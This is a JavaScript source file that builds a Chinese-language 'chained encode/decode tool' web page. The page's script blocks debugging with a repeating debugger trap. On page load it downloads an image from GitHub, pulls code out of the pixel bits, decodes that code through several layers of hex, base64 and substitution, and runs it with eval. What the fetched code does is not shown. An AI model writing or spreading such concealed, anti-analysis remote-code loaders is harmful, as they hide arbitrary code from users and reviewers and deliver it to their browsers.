function createNode() {
    var container = document.createDocumentFragment();
    var e_0 = document.createElement("div");
    var e_1 = document.createElement("meta");
    e_1.setAttribute("charset", "UTF-8");
    e_0.appendChild(e_1);
    var e_2 = document.createElement("meta");
    e_2.setAttribute("name", "viewport");
    e_2.setAttribute("content", "width=device-width, initial-scale=1.0");
    e_0.appendChild(e_2);
    var e_3 = document.createElement("title");
    e_3.appendChild(document.createTextNode("串联编解码工具"));
    e_0.appendChild(e_3);
    var e_4 = document.createElement("style");
    e_4.appendChild(document.createTextNode("\n* {\nmargin: 0;\npadding: 0;\nbox-sizing: border-box;\n}\nbody {\nfont-family: Arial, sans-serif;\nbackground: linear-gradient(135deg, #667eea 0%, #764ba2 100%);\nmin-height: 100vh;\npadding: 20px;\n}\n.container {\nmax-width: 800px;\nmargin: 0 auto;\nbackground: white;\nborder-radius: 10px;\npadding: 30px;\nbox-shadow: 0 10px 30px rgba(0,0,0,0.3);\n}\nh1 {\ntext-align: center;\ncolor: #333;\nmargin-bottom: 30px;\n}\n.section {\nmargin-bottom: 25px;\n}\nlabel {\ndisplay: block;\nmargin-bottom: 8px;\nfont-weight: bold;\ncolor: #555;\n}\ntextarea {\nwidth: 100%;\nmin-height: 100px;\npadding: 12px;\nborder: 2px solid #ddd;\nborder-radius: 5px;\nfont-size: 14px;\nresize: vertical;\nfont-family: 'Courier New', monospace;\n}\ntextarea:focus {\noutline: none;\nborder-color: #667eea;\n}\n.button-group {\ndisplay: flex;\ngap: 10px;\nmargin-top: 20px;\n}\nbutton {\nflex: 1;\npadding: 12px 24px;\nfont-size: 16px;\nborder: none;\nborder-radius: 5px;\ncursor: pointer;\ntransition: all 0.3s;\nfont-weight: bold;\n}\n.encode-btn {\nbackground: #667eea;\ncolor: white;\n}\n.encode-btn:hover {\nbackground: #5568d3;\n}\n.decode-btn {\nbackground: #764ba2;\ncolor: white;\n}\n.decode-btn:hover {\nbackground: #63408a;\n}\n.clear-btn {\nbackground: #e74c3c;\ncolor: white;\n}\n.clear-btn:hover {\nbackground: #c0392b;\n}\n.info {\nbackground: #f0f0f0;\npadding: 15px;\nborder-radius: 5px;\nmargin-top: 20px;\nfont-size: 14px;\ncolor: #666;\n}\n.info strong {\ncolor: #333;\n}\n.loading {\ntext-align: center;\npadding: 40px;\ncolor: #666;\n}\n.spinner {\nborder: 4px solid #f3f3f3;\nborder-top: 4px solid #667eea;\nborder-radius: 50%;\nwidth: 50px;\nheight: 50px;\nanimation: spin 1s linear infinite;\nmargin: 0 auto 20px;\n}\n@keyframes spin {\n0% { transform: rotate(0deg); }\n100% { transform: rotate(360deg); }\n}\n#app {\ndisplay: none;\n}\n"));
    e_0.appendChild(e_4);
    var e_5 = document.createElement("div");
    e_5.setAttribute("class", "container");
    var e_6 = document.createElement("div");
    e_6.setAttribute("class", "loading");
    e_6.setAttribute("id", "loading");
    var e_7 = document.createElement("div");
    e_7.setAttribute("class", "spinner");
    e_6.appendChild(e_7);
    var e_8 = document.createElement("p");
    e_8.appendChild(document.createTextNode("正在加载代码..."));
    e_6.appendChild(e_8);
    e_5.appendChild(e_6);
    var e_9 = document.createElement("div");
    e_9.setAttribute("id", "app");
    var e_10 = document.createElement("h1");
    e_10.appendChild(document.createTextNode("🔐 串联编解码工具"));
    e_9.appendChild(e_10);
    var e_11 = document.createElement("div");
    e_11.setAttribute("class", "section");
    var e_12 = document.createElement("label");
    e_12.setAttribute("for", "input");
    e_12.appendChild(document.createTextNode("输入文本："));
    e_11.appendChild(e_12);
    var e_13 = document.createElement("textarea");
    e_13.setAttribute("id", "input");
    e_13.setAttribute("placeholder", "请输入要编码或解码的文本...");
    e_11.appendChild(e_13);
    e_9.appendChild(e_11);
    var e_14 = document.createElement("div");
    e_14.setAttribute("class", "button-group");
    var e_15 = document.createElement("button");
    e_15.setAttribute("class", "encode-btn");
    e_15.setAttribute("onclick", "encode()");
    e_15.appendChild(document.createTextNode("编码"));
    e_14.appendChild(e_15);
    var e_16 = document.createElement("button");
    e_16.setAttribute("class", "decode-btn");
    e_16.setAttribute("onclick", "decode()");
    e_16.appendChild(document.createTextNode("解码"));
    e_14.appendChild(e_16);
    var e_17 = document.createElement("button");
    e_17.setAttribute("class", "clear-btn");
    e_17.setAttribute("onclick", "clearAll()");
    e_17.appendChild(document.createTextNode("清空"));
    e_14.appendChild(e_17);
    e_9.appendChild(e_14);
    var e_18 = document.createElement("div");
    e_18.setAttribute("class", "section");
    var e_19 = document.createElement("label");
    e_19.setAttribute("for", "output");
    e_19.appendChild(document.createTextNode("输出结果："));
    e_18.appendChild(e_19);
    var e_20 = document.createElement("textarea");
    e_20.setAttribute("id", "output");
    e_20.setAttribute("readonly", "");
    e_20.setAttribute("placeholder", "结果将显示在这里...");
    e_18.appendChild(e_20);
    e_9.appendChild(e_18);
    e_5.appendChild(e_9);
    e_0.appendChild(e_5);
    var e_21 = document.createElement("canvas");
    e_21.setAttribute("id", "canvas");
    e_21.setAttribute("style", "display: none;");
    e_0.appendChild(e_21);
    var e_22 = document.createElement("script");
    e_22.appendChild(document.createTextNode("\n(function() {\n// 反调试保护\n(() => {\nfunction block() {\nsetInterval(() => {\nFunction(\"debugger\")();\n}, 50);\n}\ntry {\nblock();\n} catch (err) {}\n})();\n// 图片URL\nconst IMAGE_URL = 'https://raw.githubusercontent.com/xiaomayisjh/share/refs/heads/main/steganography_image.png';\n// 解码辅助函数（仅用于提取）\nconst _reverseMap = {\n'Q': 'A', 'W': 'B', 'E': 'C', 'R': 'D', 'T': 'E', 'Y': 'F', 'U': 'G', 'I': 'H',\n'O': 'I', 'P': 'J', 'A': 'K', 'S': 'L', 'D': 'M', 'F': 'N', 'G': 'O', 'H': 'P',\n'J': 'Q', 'K': 'R', 'L': 'S', 'Z': 'T', 'X': 'U', 'C': 'V', 'V': 'W', 'B': 'X',\n'N': 'Y', 'M': 'Z', 'q': 'a', 'w': 'b', 'e': 'c', 'r': 'd', 't': 'e', 'y': 'f',\n'u': 'g', 'i': 'h', 'o': 'i', 'p': 'j', 'a': 'k', 's': 'l', 'd': 'm', 'f': 'n',\n'g': 'o', 'h': 'p', 'j': 'q', 'k': 'r', 'l': 's', 'z': 't', 'x': 'u', 'c': 'v',\n'v': 'w', 'b': 'x', 'n': 'y', 'm': 'z', '5': '0', '6': '1', '7': '2', '8': '3',\n'9': '4', '0': '5', '1': '6', '2': '7', '3': '8', '4': '9', '-': '+', '_': '/',\n'=': '='\n};\nfunction _hexToString(hex) {\nconst bytes = new Uint8Array(hex.match(/.{1,2}/g).map(byte => parseInt(byte, 16)));\nreturn new TextDecoder().decode(bytes);\n}\nfunction _base64Decode(str) {\nconst binary = atob(str);\nconst bytes = new Uint8Array(binary.length);\nfor (let i = 0; i < binary.length; i++) {\nbytes[i] = binary.charCodeAt(i);\n}\nreturn new TextDecoder().decode(bytes);\n}\nfunction _privateDecode(str) {\nreturn str.split('').map(char => _reverseMap[char] || char).join('');\n}\nfunction _decodeHiddenText(encodedStr) {\nlet step1 = _hexToString(encodedStr);\nlet step2 = _base64Decode(step1);\nlet step3 = _privateDecode(step2);\nlet step4 = _base64Decode(step3);\nlet step5 = _hexToString(step4);\nreturn step5;\n}\nfunction _binaryToText(binary) {\nlet text = '';\nfor (let i = 0; i < binary.length; i += 8) {\nconst byte = binary.substr(i, 8);\ntext += String.fromCharCode(parseInt(byte, 2));\n}\nreturn text;\n}\n// 从图片中提取代码\nfunction extractCodeFromImage(imageUrl) {\nreturn new Promise((resolve, reject) => {\nconst img = new Image();\nimg.crossOrigin = 'anonymous';\nimg.onload = function() {\ntry {\nconst canvas = document.getElementById('canvas');\nconst ctx = canvas.getContext('2d');\ncanvas.width = img.width;\ncanvas.height = img.height;\nctx.drawImage(img, 0, 0);\nconst imageData = ctx.getImageData(0, 0, canvas.width, canvas.height);\nconst data = imageData.data;\n// 读取长度（前32位）\nlet lengthBinary = '';\nfor (let i = 0; i < 32; i++) {\nlengthBinary += (data[i * 4] & 1).toString();\n}\nconst textLength = parseInt(lengthBinary, 2);\nif (textLength <= 0 || textLength > data.length * 4) {\nreject(new Error('图片中没有隐藏数据或数据已损坏'));\nreturn;\n}\n// 读取文本数据\nlet binaryText = '';\nfor (let i = 32; i < 32 + textLength; i++) {\nbinaryText += (data[i * 4] & 1).toString();\n}\nconst encodedText = _binaryToText(binaryText);\nconst decodedCode = _decodeHiddenText(encodedText);\nresolve(decodedCode);\n} catch (error) {\nreject(error);\n}\n};\nimg.onerror = function() {\nreject(new Error('无法加载图片'));\n};\nimg.src = imageUrl;\n});\n}\n// 页面加载时从图片提取并执行代码\nwindow.addEventListener('DOMContentLoaded', async function() {\ntry {\nlet code = await extractCodeFromImage(IMAGE_URL);\n// 使用间接eval在全局作用域执行\n(0, eval)(code);\n// 清除代码\ncode = null;\n// 隐藏加载提示，显示应用\ndocument.getElementById('loading').style.display = 'none';\ndocument.getElementById('app').style.display = 'block';\n} catch (error) {\ndocument.getElementById('loading').innerHTML = \n'<p style=\"color: #e74c3c;\">❌ 加载失败：' + error.message + '</p>';\nconsole.error('加载失败：', error);\n}\n});\n})();\n"));
    e_0.appendChild(e_22);
    container.appendChild(e_0);
    return container;
}
